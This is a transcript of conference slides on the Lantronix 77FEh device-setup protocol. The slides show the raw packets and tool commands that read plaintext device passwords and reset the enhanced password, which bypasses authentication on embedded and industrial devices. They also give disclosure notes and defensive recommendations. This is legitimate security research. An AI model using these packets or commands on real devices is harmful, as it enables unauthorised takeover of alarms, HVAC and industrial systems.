Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

1,580 views

Published on

Presentation presented at Confidence 2014 -
Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,580
On SlideShare
0
From Embeds
0
Number of Embeds
11
Actions
Shares
0
Downloads
13
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

  1. 1. 1 Mos Eisley Lab Confidence 2014 Exploring treasures of 77FEh Getting access to Lantronix devices Vlatko Kosturjak, Diverto @k0st
  2. 2. 2 Mos Eisley Lab Who are you!?!!?? ● Security Jedi at Diverto – Bringing balance to the force ● Experience – Offensive (Penetration tester) – Defensive (Developer/System Administrator/...) – Have code in: Nmap, Metasploit, OpenVAS, … – Author of free software: https://github.com/kost/ ● If you trust in certificates – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
  3. 3. 3 Mos Eisley Lab Agenda ● Introduction - Lantronix ● Physical access ● WTF is 77FEh? ● Vulnerabilities & Exploitation ● Recommendations ● Questions and answers 45 minutes
  4. 4. 4 Mos Eisley Lab Lantronix Source: www.lantronix.com
  5. 5. 5 Mos Eisley Lab You can find them as integral part of ● Alarms ● HVACs ● Pool monitoring systems ● Sprinkler controllers ● Hacked vacuum cleaners - Roombas ● Embedded systems ● Industrial systems Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
  6. 6. 6 Mos Eisley Lab What they are running actually? ● OS – CoBos (mostly) – Evolution OS/Linux – ThreadX – Linux ● Support – 1 or more serial ports – Modbus (few models) – 10/100 Ethernet
  7. 7. 7 Mos Eisley Lab Physical access ● Like usual – Game over ● Serial access – No password by design ● Requirements – Standard TTL cable – BusPirate – ...
  8. 8. 8 Mos Eisley Lab Connecting to serial port... ● 9600 bps 8/N/1 ● Flow control: None
  9. 9. 9 Mos Eisley Lab Most frequent services Available – TCP/IP ● Web (tcp/80) ● Telnet (tcp/9999) ● 77FEh (tcp-udp/30718) ● SNMP (udp/161) Telnet administration interface What is this? Mostly information disclosures Simple web server Serving applet JAR which talks to 30718 port
  10. 10. 10 Mos Eisley Lab Device Discovery ● Ask :) ● Look if you have physical access ● Passive ● Active/Scanning – Standard port scanning is fine with conservative timing – Broadcast UDP to specific Lantronix ports (30718) ● Beware – Version scanning(-sV) or running vulnerability scanners may misconfigure device –
  11. 11. 11 Mos Eisley Lab Telnet administration $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Password :
  12. 12. 12 Mos Eisley Lab So, WTF is 77FEh finally? ● 0x77FE = 30718 (10) ● TCP/UDP protocol for device setup – Proprietary protocol – Used by DeviceInstaller (proprietary software from Lantronix) ● Designed for – Setup of device – Administration of device – Getting device info – Insecurity (sorry, had to write it, you'll see later ;) )
  13. 13. 13 Mos Eisley Lab Sample 77FEh communication [v] Sending 4 bytes: 0x00000000 (00000) 000000f6 .... [v] Received 30 bytes: (00000) 000000f7 00108005 58324400 df0e0000 ........X2D..... (00016) 62a7d944 00000000 00204a91 84fb b..D..... J... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip> Query setup request (4) Query setup response (4) MAC address of the device (6) Device type
  14. 14. 14 Mos Eisley Lab Interesting request – #1 ● [v] Sending 4 bytes: ● 0x00000000 (00000) 000000f8 .... ● ● [v] Received 124 bytes: ● 0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST ● 0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L........... ● 0x00000020 (00032) cc070000 00000000 00000000 00000000 ................ ● 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ ● 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ ● 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ ● 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ ● 0x00000070 (00112) 00000000 00000000 00000000 ............ Query setup (4) Simple Password In Plaintext (4) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip> IPv4 (4)
  15. 15. 15 Mos Eisley Lab Previous – work ● Metasploit – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● Tools – Simple C program by jgor ● https://github.com/jgor/lantronix-telnet-pw
  16. 16. 16 Mos Eisley Lab But... ● Simple password is not set ● Device still asks for password ● Further digging – Enhanced password in place – You cannot get/reset the enhanced password easily – Length is bigger (4->16) – Challenge!!!
  17. 17. 17 Mos Eisley Lab Introduction to enhanced passwords Source: Lantronix documentation Feature/Type Simple Password Enhanced Password Length 4 16 Visible in query setup yes no
  18. 18. 18 Mos Eisley Lab Source: Mohdafri. com
  19. 19. 19 Mos Eisley Lab Interesting request - #2 [v] Sending 4 bytes: 0x00000000 (00000) 000000f4 .... [v] Received 32 bytes: 0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST 0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3......... 0x00000020 (00032) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip> Simple Password In Plaintext (4) Query ext version Request (4) Version (6)
  20. 20. 20 Mos Eisley Lab Interesting request #3 ● Request to query configuration – 000000eX ● Response to query configuration – 000000bX + followed by 126 bytes of setup – ● X=number of setup records (0 – F): – 0 basic setup record ● Simple password, IP... – 1 security record ● Enhanced password, AES key, SNMP... – 2 specific products / situations – 3 OEMs – ... Wrong! Request for security record 1 provides just zero bytes! HALF
  21. 21. 21 Mos Eisley Lab Interesting request #4 ● Request to change configuration – 000000cX + followed by 126 bytes of setup ● Response to change configuration – 000000bX – ● X=number of setup records (0 – F): – 0 basic setup record – 1 security record – 2 specific products / situations – 3 OEMs
  22. 22. 22 Mos Eisley Lab Setting setup record 1 for security [v] Sending 130 bytes: 0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................ 0x00000010 (00016) 00000000 00000000 00000000 00000000 ................ 0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public.... 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ 0x00000070 (00112) 00000000 00000000 00000000 00000000 ................ 0x00000080 (00128) 0000 .. [v] Received 4 bytes: 0x00000000 (00000) 000000b1 .... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip> Setting Setup record 1 Was successful Set Setup record 1 (security) request SNMP Community String (13) Enhanced Password (16)
  23. 23. 23 Mos Eisley Lab Enhanced password gone no password to enter! $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Press Enter for Setup Mode
  24. 24. 24 Mos Eisley Lab Authentication Algorithm Guess Authenticate Enhanced Password Simple Password Enhanced Not set Ask for enhanced Ask for simple Display setup menu Enhanced set Simple set Simple Not set Password OK
  25. 25. 25 Mos Eisley Lab New tool: lantronix-witchcraft ● 77FEh protocol implementation ● 77FEh security related utility ● All the tricks mentioned implemented ● Free software: GPL2 ● Requirement: Perl ● Available at – https://github.com/kost/lantronix-witchcraft
  26. 26. 26 Mos Eisley Lab Basic usage: ● Display Mac address: – ./lantronix-witchcraft.pl -Q <ip> ● Display Simple Password (up to 4 characters) – ./lantronix-witchcraft.pl -P <ip> ● Reset Security record (together with enhanced password) – ./lantronix-witchcraft.pl -E <ip> ● Reset Security record without AES (with enhanced password) – ./lantronix-witchcraft.pl -S <ip> ● Dump setup records – ./lantronix-witchcraft.pl -G -D <ip>
  27. 27. 27 Mos Eisley Lab Brave enough? ● One command to rule them all ● Display Mac address and simple password, dump setup records, reset security records together with enhanced password: – – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip> ●
  28. 28. 28 Mos Eisley Lab Still wondering why automatic scanning is bad for Lantronix? ● ● Dump of setup record: 00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y| 00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0| 00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{| 00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0| 00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
  29. 29. 29 Mos Eisley Lab Correct way ● Ask – Someone responsible if they could have something like that ● Send broadcast query packet to 77FEh ● Identify ports 30718 open (TCP or UDP) ● Dump setup records ● Play ;) ● Check if it is still working... – If yes, perfect – If not: huh, but you should restore setup records somehow ;)
  30. 30. 30 Mos Eisley Lab It's not about Lantronix... ● ...they warned the vendors about it in their documentation Source: Lantronix documentation
  31. 31. 31 Mos Eisley Lab Disclosure Problem ● It's more about vendors who implement Lantronix in their devices ● Whom to report? – Lantronix – I guess they know their protocol ;) – OEMs – hard to find all their customers ;) ● Awareness – Conference – Tools
  32. 32. 32 Mos Eisley Lab But maybe it could be done... ● Add white list ● Encryption/SSL? Source: Lantronix documentation
  33. 33. 33 Mos Eisley Lab Recommendations ● Have some other device to VPN/SSL tunnel the services ● Telnet only through VPN or other secure channel to administration interface ● Disable 77FEh if not needed ● Filter out 77FEh on network devices to only allowed ones ● Disable other unneccesary services (SNMP, telnet, etc).
  34. 34. 34 Mos Eisley Lab Summary Source: duki@fb
  35. 35. 35 Mos Eisley Lab Summary ● There are ways to pass beyond authentication (if 77FEh is enabled) – Simple passwords – Enhanced passwords ● Tools – Metasploit Lantronix modules – https://github.com/kost/lantronix-witchcraft ● Recommendations – Disable 77FEh if not needed or Filter out 77FEh on network devices to only allowed ones – Tunnel VPN/SSL all communication to these devices ● Future – There are things to research: way to obtain enhanced password or AES keys for example
  36. 36. 36 Mos Eisley Lab Acknowledgements - Thanks ● Previous work (Simple Passwords) – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● https://github.com/jgor/lantronix-telnet-pw ● Colleagues – Dalibor Dosegović, hardware wizard
  37. 37. 37 Mos Eisley Lab Thank you! Questions and Answers @k0st

×